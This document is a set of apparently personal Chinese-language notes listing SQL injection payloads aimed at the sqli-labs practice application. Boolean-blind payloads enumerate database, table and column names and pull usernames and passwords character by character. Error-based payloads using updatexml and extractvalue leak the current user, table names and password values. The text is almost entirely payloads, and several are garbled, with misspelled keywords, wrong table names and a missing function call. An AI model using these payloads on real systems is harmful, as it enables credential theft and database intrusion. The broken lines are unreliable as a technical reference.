传递

id=1'and (select count(schema_name) from information_schema.schema)=7--+

?id=1’ and (select length(schema_name) from information_schema.schemata limit 0,1)=18--+

ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105–+

and (select count(table_name) from information_schema.tables where table_schema=’security’)=4–+

8. 判断user表名下有几个字段 3
   and (select count(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’)=3 --+

9.判断字段的长度
and (select length(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1)=2 --+

10.通过acsii()函数判断字段的名字 id,username,password
and ascii((select column_name from information_schema.column where table_schema=’security’ and table_name=’users’ limit 0,1),1,1)=105 --+
11.判断username字段有多少行 13
(select count(username) from security.users)=13 --+
12.判断username字段的第一行值的长度 4
(select length(username) from security.users)=4 --+

13.通过ascii()函数判断username字段的第一行值的名字 Dump
ascii(substr((select username from security.users limit 0,1),1,1))=68 --+

127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e,(select user())),1) --+

2.爆当前数据库下所有的表：
127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1)),1) --+

3.爆user表下的字段名：
127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)),1) --+

4.爆username.password的值：
127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select password from security.users limit 0,1)),1) --+

127.0.0.1/sqli/Less-1/?id=1’ and (extractvalue(1,concat(0x7e,(selecet user()),0x7e))) --+